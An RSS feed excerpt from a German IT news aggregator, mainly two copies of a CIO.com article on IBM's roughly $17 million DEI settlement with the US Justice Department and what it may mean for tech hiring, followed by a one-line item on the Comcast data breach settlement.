<guid isPermaLink="true">https://tsecurity.de/de/3433999/it-nachrichten/ibms-government-dei-settlement-could-increase-pressure-to-avoid-tech-hiring-diversity/</guid>
<pubDate>Wed, 15 Apr 2026 06:17:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IBM has agreed to settle a complaint from the US Justice Department around its initiatives to diversify its workforce and to encourage hiring of underrepresented groups, contrary to a presidential directive. The federal contractor also agreed to pay the government roughly $17 million.</p>



<p>The <a href="https://www.whitehouse.gov/fact-sheets/2026/03/fact-sheet-president-donald-j-trump-addresses-dei-discrimination-by-federal-contractors/" target="_blank" rel="noreferrer noopener">pressure from the Trump administration</a> to eliminate workforce diversification efforts, typically known as DEI (Diversity, Equity, and Inclusion) programs, has persuaded many companies, including Meta, Google, Amazon, Salesforce, Intel, OpenAI, Tesla and Zoom, <a href="https://www.cio.com/article/3854334/the-current-state-of-dei-in-the-tech-industry.html" target="_blank">to publicly back away</a> from those diversification efforts. A few companies, including Apple, Microsoft, Nvidia and Oracle, have held firm in favor of DEI, for the most part. </p>



<p>The government’s official position states that age, race, sexual preference, and gender should have zero impact on hiring decisions. Diversification proponents counter that workforce composition will stay stagnant unless explicit efforts are made to diversify.</p>



<h2 class="wp-block-heading">Focus of settlement</h2>



<p>The Justice Department settlement focused mostly on IBM’s role as a government contractor.</p>



<p>The government filing said IBM made “false claims” and “false statements” to the government regarding hiring practices in connection with IBM’s government contract work.</p>



<p>“As a federal contractor, IBM was required to comply with anti-discrimination requirements as set forth in Title VII of the Civil Rights Act of 1964,” the settlement said, adding that IBM “discriminated against employees during employment and applicants for employment because of race, color, national origin, or sex, and failed to treat employees during employment without regard to race, color, national origin, or sex.”</p>



<p>Beyond hiring practices, the government also opposed hiring goals that encouraged diversity, including “developing race and sex demographic goals for business units and taking race, color, national origin, or sex into account when making employment decisions to achieve progress towards those demographic goals” and using those same criteria to offer “certain training, partnerships, mentoring, leadership development programs, educational opportunities or resources, and/or similar opportunities only to certain employees.”</p>



<p>The agreement also said that the deal “is neither an admission of liability by IBM nor a concession by the United States that its claims are not well founded” and added that IBM agreed to the settlement “to avoid the delay, uncertainty, inconvenience and expense of protracted litigation.”</p>



<p>Acting US Attorney General Todd Blanche <a href="https://www.justice.gov/opa/pr/ibm-pays-17-million-resolve-allegations-discrimination-through-illegal-dei-practices" target="_blank" rel="noreferrer noopener">issued a statement</a> saying, “racial discrimination is illegal, and government contractors cannot evade the law by repackaging it as DEI.”</p>



<p>IBM did not respond to an email seeking comment.</p>



<h2 class="wp-block-heading">Companies can work around biases</h2>



<p><a href="https://www.linkedin.com/in/bhoward7/" target="_blank" rel="noreferrer noopener">Bryan Howard</a>, the CEO of recruiting strategy consulting firm Peoplyst, said he would encourage enterprises to simply move their workforce diversification efforts earlier in the recruitment process. </p>



<p>“There’s a big difference between candidate pool and the selection process,” Howard said, suggesting that there are no federal rules limiting outreach choices. If, for example, a company wanted to increase workforce representation for a particular group, then the job notice should be focused on universities and other places where that group is well represented.</p>



<p>“Expand your pool and do not contract it. Fish in the ponds where those people are,” Howard said. “Increase diversity by simply recruiting from diverse sources.”</p>



<p>Howard also said the government position leverages last year’s US Supreme Court decision in <a href="https://www.supremecourt.gov/opinions/24pdf/23-1039_c0n2.pdf" target="_blank" rel="noreferrer noopener">Ames v. Ohio Department of Youth Services</a>, where the court held that reverse discrimination is illegal. </p>



<p>Complicating diversification efforts today are two popular recruiting/hiring tools pushed by HR: Using genAI to filter a massive number of applicants and only present a small handful to the hiring managers to choose from; and referral programs in which employees are offered cash incentives if they recommend job candidates who are eventually hired.</p>



<p>AI’s bias is to seek job candidates whose profiles most closely resemble that of the current workforce. In other words, AI wants to learn everything it can about who the company has hired before, to help it determine the attributes to look for. </p>



<p>Referral programs, Howard said, also tend to attract people with the same characteristics as the existing workforce. Even though those referral hires tend to stay with the company longer, “if you have a population that is already skewed and that is the population recruiting, the existing bias will likely continue.”</p>



<h2 class="wp-block-heading">Settlement could hurt recruitment efforts</h2>



<p>Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, said it is difficult to interpret the settlement as anything other than opposing DEI efforts. </p>



<p>The US Justice Department, where Levine once worked as a federal prosecutor, ”has issued a multi-million dollar penalty for company policy that seemed to be intended to encourage diversity,” he said. “<a href="https://www.computerworld.com/article/4142786/anthropics-us-govt-lawsuit-says-federal-action-unprecedented-and-unlawful.html" target="_blank">As with Anthropic</a>, in this new world, sometimes organizations may be forced to choose between ‘the law’ as it is currently being interpreted by some, and a good faith effort to positively influence society, or at least to minimize societal harm.”</p>



<p>Levine said some enterprises may try to overcompensate to keep the current administration happy.</p>



<p>“Fearing financial penalties, some companies that work with the federal government will now choose to ensure their DEI program is fully dismantled,” Levine said. “Other companies may choose to cease working with the federal government and/or may choose to keep, or even double down, on their DEI program. If Anthropic is any indication, these latter companies may ultimately be rewarded in the market.”</p>



<p><a href="https://www.linkedin.com/in/fvillanustre/" target="_blank" rel="noreferrer noopener">Flavio Villanustre</a>, CISO for the LexisNexis Risk Solutions Group, added that this settlement might end up hurting tech recruitment efforts. </p>



<p>“I think that this will force organizations to reframe their DEI programs to not upset the DOJ, which could have an impact on hiring of individuals in certain classes and could result in overall less diversity,” Villanustre said. “Diversity is an important part of building resilient, successful organizations, so this could have a broader impact than just the one at hiring time.”</p>



<p><em>This article originally appeared on <a href="https://www.cio.com/article/4158892/ibms-government-dei-settlement-could-increase-pressure-to-avoid-tech-hiring-diversity.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[IBM’s government DEI settlement could increase pressure to avoid tech hiring diversity]]></title>
<description><![CDATA[IBM has agreed to settle a complaint from the US Justice Department around its initiatives to diversify its workforce and to encourage hiring of underrepresented groups, contrary to a presidential directive. The federal contractor also agreed to pay the government roughly $17 million.



The pres...]]></description>
<link>https://tsecurity.de/de/3433965/it-nachrichten/ibms-government-dei-settlement-could-increase-pressure-to-avoid-tech-hiring-diversity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3433965/it-nachrichten/ibms-government-dei-settlement-could-increase-pressure-to-avoid-tech-hiring-diversity/</guid>
<pubDate>Wed, 15 Apr 2026 06:02:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IBM has agreed to settle a complaint from the US Justice Department around its initiatives to diversify its workforce and to encourage hiring of underrepresented groups, contrary to a presidential directive. The federal contractor also agreed to pay the government roughly $17 million.</p>



<p>The <a href="https://www.whitehouse.gov/fact-sheets/2026/03/fact-sheet-president-donald-j-trump-addresses-dei-discrimination-by-federal-contractors/" target="_blank" rel="nofollow">pressure from the Trump administration</a> to eliminate workforce diversification efforts, typically known as DEI (Diversity, Equity, and Inclusion) programs, has persuaded many companies, including Meta, Google, Amazon, Salesforce, Intel, OpenAI, Tesla and Zoom, <a href="https://www.cio.com/article/3854334/the-current-state-of-dei-in-the-tech-industry.html" target="_blank">to publicly back away</a> from those diversification efforts. A few companies, including Apple, Microsoft, Nvidia and Oracle, have held firm in favor of DEI, for the most part. </p>



<p>The government’s official position states that age, race, sexual preference, and gender should have zero impact on hiring decisions. Diversification proponents counter that workforce composition will stay stagnant unless explicit efforts are made to diversify.</p>



<h2 class="wp-block-heading">Focus of settlement</h2>



<p>The Justice Department settlement focused mostly on IBM’s role as a government contractor.</p>



<p>The government filing said IBM made “false claims” and “false statements” to the government regarding hiring practices in connection with IBM’s government contract work.</p>



<p>“As a federal contractor, IBM was required to comply with anti-discrimination requirements as set forth in Title VII of the Civil Rights Act of 1964,” the settlement said, adding that IBM “discriminated against employees during employment and applicants for employment because of race, color, national origin, or sex, and failed to treat employees during employment without regard to race, color, national origin, or sex.”</p>



<p>Beyond hiring practices, the government also opposed hiring goals that encouraged diversity, including “developing race and sex demographic goals for business units and taking race, color, national origin, or sex into account when making employment decisions to achieve progress towards those demographic goals” and using those same criteria to offer “certain training, partnerships, mentoring, leadership development programs, educational opportunities or resources, and/or similar opportunities only to certain employees.”</p>



<p>The agreement also said that the deal “is neither an admission of liability by IBM nor a concession by the United States that its claims are not well founded” and added that IBM agreed to the settlement “to avoid the delay, uncertainty, inconvenience and expense of protracted litigation.”</p>



<p>Acting US Attorney General Todd Blanche <a href="https://www.justice.gov/opa/pr/ibm-pays-17-million-resolve-allegations-discrimination-through-illegal-dei-practices" target="_blank" rel="nofollow">issued a statement</a> saying, “racial discrimination is illegal, and government contractors cannot evade the law by repackaging it as DEI.”</p>



<p>IBM did not respond to an email seeking comment.</p>



<h2 class="wp-block-heading">Companies can work around biases</h2>



<p><a href="https://www.linkedin.com/in/bhoward7/" target="_blank" rel="nofollow">Bryan Howard</a>, the CEO of recruiting strategy consulting firm Peoplyst, said he would encourage enterprises to simply move their workforce diversification efforts earlier in the recruitment process. </p>



<p>“There’s a big difference between candidate pool and the selection process,” Howard said, suggesting that there are no federal rules limiting outreach choices. If, for example, a company wanted to increase workforce representation for a particular group, then the job notice should be focused on universities and other places where that group is well represented.</p>



<p>“Expand your pool and do not contract it. Fish in the ponds where those people are,” Howard said. “Increase diversity by simply recruiting from diverse sources.”</p>



<p>Howard also said the government position leverages last year’s US Supreme Court decision in <a href="https://www.supremecourt.gov/opinions/24pdf/23-1039_c0n2.pdf" target="_blank" rel="nofollow">Ames v. Ohio Department of Youth Services</a>, where the court held that reverse discrimination is illegal. </p>



<p>Complicating diversification efforts today are two popular recruiting/hiring tools pushed by HR: Using genAI to filter a massive number of applicants and only present a small handful to the hiring managers to choose from; and referral programs in which employees are offered cash incentives if they recommend job candidates who are eventually hired.</p>



<p>AI’s bias is to seek job candidates whose profiles most closely resemble that of the current workforce. In other words, AI wants to learn everything it can about who the company has hired before, to help it determine the attributes to look for. </p>



<p>Referral programs, Howard said, also tend to attract people with the same characteristics as the existing workforce. Even though those referral hires tend to stay with the company longer, “if you have a population that is already skewed and that is the population recruiting, the existing bias will likely continue.”</p>



<h2 class="wp-block-heading">Settlement could hurt recruitment efforts</h2>



<p>Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="nofollow">Brian Levine</a>, executive director of FormerGov, said it is difficult to interpret the settlement as anything other than opposing DEI efforts. </p>



<p>The US Justice Department, where Levine once worked as a federal prosecutor, ”has issued a multi-million dollar penalty for company policy that seemed to be intended to encourage diversity,” he said. “<a href="https://www.computerworld.com/article/4142786/anthropics-us-govt-lawsuit-says-federal-action-unprecedented-and-unlawful.html" target="_blank">As with Anthropic</a>, in this new world, sometimes organizations may be forced to choose between ‘the law’ as it is currently being interpreted by some, and a good faith effort to positively influence society, or at least to minimize societal harm.”</p>



<p>Levine said some enterprises may try to overcompensate to keep the current administration happy.</p>



<p>“Fearing financial penalties, some companies that work with the federal government will now choose to ensure their DEI program is fully dismantled,” Levine said. “Other companies may choose to cease working with the federal government and/or may choose to keep, or even double down, on their DEI program. If Anthropic is any indication, these latter companies may ultimately be rewarded in the market.”</p>



<p><a href="https://www.linkedin.com/in/fvillanustre/" target="_blank" rel="nofollow">Flavio Villanustre</a>, CISO for the LexisNexis Risk Solutions Group, added that this settlement might end up hurting tech recruitment efforts. </p>



<p>“I think that this will force organizations to reframe their DEI programs to not upset the DOJ, which could have an impact on hiring of individuals in certain classes and could result in overall less diversity,” Villanustre said. “Diversity is an important part of building resilient, successful organizations, so this could have a broader impact than just the one at hiring time.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Claim Your Share of the $117.5 Million Comcast Data Breach Settlement]]></title>
<description><![CDATA[In 2023, 36 million Xfinity customers had personal information stolen by data thieves.]]></description>
<link>https://tsecurity.de/de/3433528/it-nachrichten/how-to-claim-your-share-of-the-1175-million-comcast-data-breach-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3433528/it-nachrichten/how-to-claim-your-share-of-the-1175-million-comcast-data-breach-settlement/</guid>
<pubDate>Tue, 14 Apr 2026 22:47:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In 2023, 36 million Xfinity customers had personal information stolen by data thieves.]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,09ms -->